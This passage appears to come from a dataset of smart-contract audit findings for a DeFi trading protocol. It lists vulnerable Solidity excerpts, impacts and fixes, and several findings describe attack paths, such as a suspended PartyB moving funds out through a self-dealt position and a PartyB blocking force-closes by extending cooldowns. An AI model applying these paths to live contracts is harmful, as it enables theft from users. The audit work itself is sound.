accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n -Liquidating pending quotes doesn't return trading fee to party AчmediumчWhen a user is liquidated, the trading fees of the pending quotes aren't returned.\\nWhen a pending/locked quote is canceled, the trading fee is sent back to party A, e.g.\\nBut, when a pending quote is liquidated, the trading fee is not used for the liquidation. Instead, the fee collector keeps the funds:\\n```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n \"LiquidationFacet: PartyA is solvent\"\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n\\n```\\n function liquidatePartyB(\\n address partyB,\\n address partyA,\\n SingleUpnlSig memory upnlSig\\n ) internal {\\n // // rest of code\\n uint256[] storage pendingQuotes = quoteLayout.partyAPendingQuotes[partyA];\\n\\n for (uint256 index = 0; index < pendingQuotes.length; ) {\\n Quote storage quote = quoteLayout.quotes[pendingQuotes[index]];\\n if (\\n quote.partyB == partyB &&\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING)\\n ) {\\n accountLayout.pendingLockedBalances[partyA].subQuote(quote);\\n\\n pendingQuotes[index] = pendingQuotes[pendingQuotes.length - 1];\\n pendingQuotes.pop();\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n } else {\\n index++;\\n }\\n }\\n```\\n\\nThese funds should be used to cover the liquidation. Since no trade has been executed, the fee collector shouldn't earn anything.чreturn the funds to party A. If party A is being liquidated, use the funds to cover the liquidation. Otherwise, party A keeps the funds.чLiquidation doesn't use paid trading fees to cover outstanding balances. Instead, the funds are kept by the fee collector.ч```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n \"LiquidationFacet: PartyA is solvent\"\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n -In case if trading fee will be changed then refund will be done with wrong amountчmediumчIn case if trading fee will be changed then refund will be done with wrong amount\\nWhen user creates quote, then he pays trading fees. Amount that should be paid is calculated inside `LibQuote.getTradingFee` function.\\n```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n\\nAs you can see `symbol.tradingFee` is used to determine fee amount. This fee can be changed any time.\\nWhen order is canceled, then fee should be returned to user. This function also uses `LibQuote.getTradingFee` function to calculate fee to return.\\nSo in case if order was created before fee changes, then returned amount will be not same, when it is canceled after fee changes.чYou can store fee paid by user inside quote struct. And when canceled return that amount.чUser or protocol losses portion of funds.ч```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n -lockQuote() increaseNonce parameters do not work properlyчmediumчin `lockQuote()` will execute `partyBNonces[quote.partyB][quote.partyA] += 1` if increaseNonce == true But this operation is executed before setting `quote.partyB`, resulting in actually setting `partyBNonces[address(0)][quote.partyA] += 1`\\nin `lockQuote()` , when execute `partyBNonces[quote.partyB][quote.partyA] += 1` , `quote.paryB` is address(0)\\n```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n\\nactually setting `partyBNonces[address(0)][quote.partyA] += 1`ч```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n- accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n+ accountLayout.partyBNonces[msg.sender][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\nчincreaseNonce parameters do not work properlyч```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n -Wrong calculation of solvency after request to close and after close positionчmediumч`isSolventAfterClosePosition` and `isSolventAfterRequestToClosePosition` do not account for the extra profit that the user would get from closing the position.\\nWhen a party A creates a request for closing a position, the `isSolventAfterRequestToClosePosition` function is called to check if the user is solvent after the request. In the same way, when someone tries to close a position, the `isSolventAfterClosePosition` function is called to check if both party A and party B are solvent after closing the position.\\nBoth functions calculate the available balance for party A and party B, and revert if it is lower than zero. After that, the function accounts for the the extra loss that the user would get as a result of the difference between `closePrice` and `upnlSig.price`, and checks if the user is solvent after that.\\nThe problem is that the function does not account for the opposite case, that is the case where the user would get an extra profit as a result of the difference between `closePrice` and `upnlSig.price`. This means that the user would not be able to close the position, even if at the end of the transaction they would be solvent.\\nProof of Concept\\nThere is an open position with:\\nPosition type: LONG\\nQuantity: 1\\nLocked: 50\\nOpened price: 100\\nCurrent price: 110\\nQuote position uPnL Party A: 10\\nParty B calls `fillCloseRequest` with:\\nClosed price: 120\\nIn `isSolventAfterClosePosition` the following is calculated:\\n```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n\\nAnd it reverts on:\\n```\\nrequire(\\n partyBAvailableBalance >= 0 && partyAAvailableBalance >= 0,\\n \"LibSolvency: Available balance is lower than zero\"\\n);\\n```\\n\\nHowever, the extra profit for `closedPrice - upnlSig.price = 120 - 110 = 10` is not accounted for in the `partyAAvailableBalance` calculation, that should be `partyAAvailableBalance = - 5 + 10 = 5`. Party A would be solvent after closing the position, but the transaction reverts.чAdd the extra profit to the `partyAAvailableBalance` calculation.чIn a situation where the difference between the closed price and the current price will make the user solvent, users will not be able to close their positions, even if at the end of the transaction they would be solvent.ч```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n -Malicious PartyB can block unfavorable close position requests causing a loss of profits for PartyBчmediumчMalicious PartyB can block close position requests that are unfavorable toward them by intentionally choose not to fulfill the close request and continuously prolonging the force close position cooldown period, causing a loss of profits for PartyA.\\nIf PartyA invokes the `requestToClosePosition` function for an open quote, the quote's status will transition from `QuoteStatus.OPEN` to `QuoteStatus.CLOSE_PENDING`. In case PartyB fails to fulfill the close request (fillCloseRequest) during the cooldown period (maLayout.forceCloseCooldown), PartyA has the option to forcibly close the quote by utilizing the `forceClosePosition` function.\\n```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n..SNIP..\\n```\\n\\nNevertheless, malicious PartyB can intentionally choose not to fulfill the close request and can continuously prolong the `quote.modifyTimestamp`, thereby preventing PartyA from ever being able to activate the `forceClosePosition` function.\\nMalicious PartyB could extend the `quote.modifyTimestamp` via the following steps:\\nLine 282 of the `fillCloseRequest` show that it is possible to partially fill a close request. As such, calls the `fillCloseRequest` function with the minimum possible `filledAmount` for the purpose of triggering the `LibQuote.closeQuote` function at Line 292.\\n```\\nFile: PartyBFacetImpl.sol\\n function fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal {\\n..SNIP..\\n if (quote.orderType == OrderType.LIMIT) {\\n require(quote.quantityToClose >= filledAmount, \"PartyBFacet: Invalid filledAmount\");\\n } else {\\n require(quote.quantityToClose == filledAmount, \"PartyBFacet: Invalid filledAmount\");\\n }\\n..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, closedPrice);\\n }\\n```\\n\\nOnce the `LibQuote.closeQuote` function is triggered, Line 153 will update the `quote.modifyTimestamp` to the current timestamp, which effectively extends the cooldown period that PartyA has to wait before allowing to forcefully close the position.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n..SNIP..\\n```\\nчThe `quote.modifyTimestamp` is updated to the current timestamp in many functions, including the `closeQuote` function, as shown in the above example. A quick search within the codebase shows that there are around 17 functions that update the `quote.modifyTimestamp` to the current timestamp when triggered. Each of these functions serves as a potential attack vector for malicious PartyB to extend the `quote.modifyTimestamp` and deny users from forcefully closing their positions\\nIt is recommended not to use the `quote.modifyTimestamp` for the purpose of determining if the force close position cooldown has reached, as this variable has been used in many other places. Instead, consider creating a new variable, such as `quote.requestClosePositionTimestamp` solely for the purpose of computing the force cancel quote cooldown.\\nThe following fixes will prevent malicious PartyB from extending the cooldown period since the `quote.requestClosePositionTimestamp` variable is only used solely for the purpose of determining if the force close position cooldown has reached.\\n```\\nfunction requestToClosePosition(\\n uint256 quoteId,\\n uint256 closePrice,\\n uint256 quantityToClose,\\n OrderType orderType,\\n uint256 deadline,\\n SingleUpnlAndPriceSig memory upnlSig\\n) internal {\\n..SNIP..\\n accountLayout.partyANonces[quote.partyA] // Add the line below\\n= 1;\\n quote.modifyTimestamp = block.timestamp;\\n// Add the line below\\n quote.requestCancelQuoteTimestamp = block.timestamp;\\n```\\n\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n// Remove the line below\\n block.timestamp > quote.modifyTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n// Add the line below\\n block.timestamp > quote.requestCancelQuoteTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n```\\n\\nIn addition, review the `forceClosePosition` function and applied the same fix to it since it is vulnerable to the same issue, but with a different impact.чPartyB has the ability to deny users from forcefully closing their positions by exploiting the issue. Malicious PartyB could abuse this by blocking PartyA from closing their positions against them when the price is unfavorable toward them. For instance, when PartyA is winning the game and decided to close some of its positions against PartyB, PartyB could block the close position request to deny PartyA of their profits and prevent themselves from losing the game.ч```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, \"PartyAFacet: Invalid state\");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n \"PartyAFacet: Cooldown not reached\"\\n );\\n..SNIP..\\n```\\n -Users might immediately be liquidated after position opening leading to a loss of CVA and Liquidation feeчmediumчThe insolvency check (isSolventAfterOpenPosition) within the `openPosition` function does not consider the locked balance adjustment, causing the user account to become insolvent immediately after the position is opened. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n\\nThe leverage of a position is computed based on the following formula.\\n$leverage = \\frac{price \\times quantity}{lockedValues.total()}$\\nWhen opening a position, there is a possibility that the leverage might change because the locked values and quantity are fixed, but it could get filled with a different market price compared to the one at the moment the user requested. Thus, the purpose of Line 163 above is to adjust the locked values to maintain a fixed leverage. After the adjustment, the locked value might be higher or lower.\\nThe issue is that the insolvency check at Line 150 is performed before the adjustment is made.\\nAssume that the adjustment in Line 163 cause the locked values to increase. The insolvency check (isSolventAfterOpenPosition) at Line 150 will be performed with old or unadjusted locked values that are smaller than expected. Since smaller locked values mean that there will be more available balance, this might cause the system to miscalculate that an account is not liquidatable, but in fact, it is actually liquidatable once the adjusted increased locked value is taken into consideration.\\nIn this case, once the position is opened, the user account is immediately underwater and can be liquidated.\\nThe issue will occur in the \"complete fill\" path and \"partial fill\" path since both paths adjust the locked values to maintain a fixed leverage. The \"complete fill\" path adjusts the locked values at Line 185чConsider performing the insolvency check with the updated adjusted locked values.чUsers might become liquidatable immediately after opening a position due to an incorrect insolvency check within the `openPosition`, which erroneously reports that the account will still be healthy after opening the position, while in reality, it is not. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.ч```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n -Suspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest`чmediumчSuspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest` function. Thus, an attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.\\n```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n\\nWhen a user is suspended, they are not allowed to call any of the `withdraw` functions (withdraw and withdrawTo) to `withdraw` funds from their account. These withdrawal functions are guarded by the `notSuspended` modifier that will revert if the user's address is suspended.\\n```\\nFile: Accessibility.sol\\n modifier notSuspended(address user) {\\n require(\\n !AccountStorage.layout().suspendedAddresses[user],\\n \"Accessibility: Sender is Suspended\"\\n );\\n _;\\n }\\n```\\n\\nHowever, suspected PartyBs can bypass this restriction by exploiting the `fillCloseRequest` function to transfer the assets out of the protocol. Following describe the proof-of-concept:\\nAnyone can be a PartyA within the protocol. Suspended PartyBs use one of their wallet addresses to operate as a PartyA.\\nUse the PartyA to create a new position with an unfavorable price that will immediately result in a significant loss for any PartyB who takes on the position. The `partyBsWhiteList` of the new position is set to PartyB address only to prevent some other PartyB from taking on this position.\\nOnce PartyB takes on the position, PartyB will immediately incur a significant loss, while PartyA will enjoy a significant gain due to the zero-sum nature of this game.\\nPartyA requested to close its position to lock the profits and PartyB will fill the close request.\\nPartyA calls the deallocate and withdraw functions to move the assets/gains out of the protocol.чAdd the `notSuspended` modifier to the `openPosition` and `fillCloseRequest` functions to block the above-described attack path.\\n```\\nfunction fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n\\n```\\nfunction openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\nчIn the event of an attack, the protocol will suspend the malicious account and prevent it from transferring ill-gotten gains out of the protocol. However, since this restriction can be bypassed, the attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.ч```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n -Imbalanced approach of distributing the liquidation fee within `setSymbolsPrice` functionчmediumчThe imbalance approach of distributing the liquidation fee within `setSymbolsPrice` function could be exploited by malicious liquidators to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, it causes harm or losses to other parties within the protocols.\\nA PartyA can own a large number of different symbols in its portfolio. To avoid out-of-gas (OOG) errors from occurring during liquidation, the `setSymbolsPrice` function allows the liquidators to inject the price of the symbols in multiple transactions instead of all in one go.\\nAssume that the injection of the price symbols requires 5 transactions/rounds to complete and populate the price of all the symbols in a PartyA's portfolio. Based on the current implementation, only the first liquidator that calls the `setSymbolsPrice` will receive the liquidation fee. Liquidators that call the `setSymbolsPrice` function subsequently will not be added to the `AccountStorage.layout().liquidators[partyA]` listing as Line 88 will only be executed once when the `liquidationType` is still not initialized yet.\\n```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n \"LiquidationFacet: Invalid upnl sig\"\\n );\\n }\\n }\\n```\\n\\nA malicious liquidator could take advantage of this by only setting the symbol prices for the first round for each liquidation happening in the protocol. To maximize their profits, the malicious liquidator would call the `setSymbolsPrice` with none or only one (1) symbol price to save on the gas cost. The malicious liquidator would then leave it to the others to complete the rest of the liquidation process, and they will receive half of the liquidation fee at the end of the liquidation process.\\nSomeone would eventually need to step in to complete the liquidation process. Even if none of the liquidators is incentivized to complete the process of setting the symbol prices since they will not receive any liquidation fee, the counterparty would eventually have no choice but to step in to perform the liquidation themselves. Otherwise, the profits of the counterparty cannot be realized. At the end of the day, the liquidation will be completed, and the malicious liquidator will still receive the liquidation fee.чConsider a more balanced approach for distributing the liquidation fee for liquidators that calls the `setSymbolsPrice` function. For instance, the liquidators should be compensated based on the number of symbol prices they have injected.\\nIf there are 10 symbols to be filled up, if Bob filled up 4 out of 10 symbols, he should only receive 40% of the liquidation fee. This approach has already been implemented within the `liquidatePartyB` function via the `partyBPositionLiquidatorsShare` variable. Thus, the same design could be retrofitted into the `setSymbolsPrice` function.чMalicious liquidators could exploit the liquidation process to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, many liquidations would be stuck halfway since it is likely that no other liquidators will step in to complete the setting of the symbol prices because they will not receive any liquidation fee for doing so (not incentivized).\\nThis could potentially lead to the loss of assets for various parties:\\nThe counterparty would eventually have no choice but to step in to perform the liquidation themselves. The counterparty has to pay for its own liquidation, even though it has already paid half the liquidation fee to the liquidator.\\nMany liquidations would be stuck halfway, and liquidation might be delayed, which exposes users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.ч```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n \"LiquidationFacet: Invalid upnl sig\"\\n );\\n }\\n }\\n```\\n -Liquidators will not be incentivized to liquidate certain PartyB accounts due to the lack of incentivesчmediumчLiquidating certain accounts does not provide a liquidation fee to the liquidators. Liquidators will not be incentivized to liquidate such accounts, which may lead to liquidation being delayed or not performed, exposing Party B to unnecessary risks and potentially resulting in greater asset losses than anticipated.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n\\nAssume that the loss of Party B is more than the liquidation fee. In this case, the else branch of the above code within the `liquidatePartyB` function will be executed. The `liquidatorShare` and `partyBPositionLiquidatorsShare` variables will both be zero, which means the liquidators will get nothing in return for liquidating PartyBs\\nAs a result, there will not be any incentive for the liquidators to liquidate such positions.чConsidering updating the liquidation incentive mechanism that will always provide some incentive for the liquidators to take the initiative to liquidate insolvent accounts. This will help to build a more robust and efficient liquidation mechanism for the protocols. One possible approach is to always give a percentage of the CVA of the liquidated account as a liquidation fee to the liquidators.чLiquidators will not be incentivized to liquidate those accounts that do not provide them with a liquidation fee. As a result, the liquidation of those accounts might 